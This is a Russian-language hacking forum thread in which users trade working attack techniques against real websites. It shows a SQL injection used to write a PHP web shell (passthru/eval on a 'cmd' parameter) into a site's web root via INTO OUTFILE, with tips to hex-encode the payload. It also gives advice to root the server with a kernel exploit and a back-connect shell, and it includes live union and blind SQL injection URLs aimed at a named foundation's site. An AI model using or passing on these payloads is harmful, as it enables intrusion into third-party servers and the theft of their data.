Помогите плз.
Узнал через пхп инъекц. доступ от МУСКУл.
Создаю в файле запрос
select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php'
Пишет ошибку,так как у нас $_GET['cmd']
Подскажите как обойти эти кавычки =)

во-первых можно захексить -
во-вторых можно без кавычек
в-третьих - юзай eval

вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла
файл создался, пишет ошибку
Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1

я чето не вижу в синтаксисе ошибку((

ты прямо подставляй запрос cmd=phpinfo();

Я ведь делаю запрос со своего сервера, с файла
$query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'";
$res = mysql_query($query);

ошибка syntax error

Если пишу eval($_GET[cmd]); <- без кавычек
то оштбка:yntax error, unexpected ')'

Помогите, может както кодировку понятную мускул зделать?

Хекси.

О )) спс)) все работает)
И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?

Да, рутай сервер.
Ищи сплоит под версию ядра (uname -a), делай бэкконект и пробуй запустить плоент.
Если год версии ядра 2010, то врят ли порутаешь.

привет команде;

http://www.msufoundation.com/impact/stories/details.php?id=-36 union all select 1,concat_ws(0x3a,unhex(hex(version())),unhex(hex(d atabase()))),3,2,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--

мы получили->4.1.14:extaffairs

http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(version(),1,1)=4 -> true

Я не знаю, почему он тут ошибки, это должно быть правдой
http://www.msufoundation.com/impact/stories/details.php?id=36 and substring(database(),1,1)="e" <-error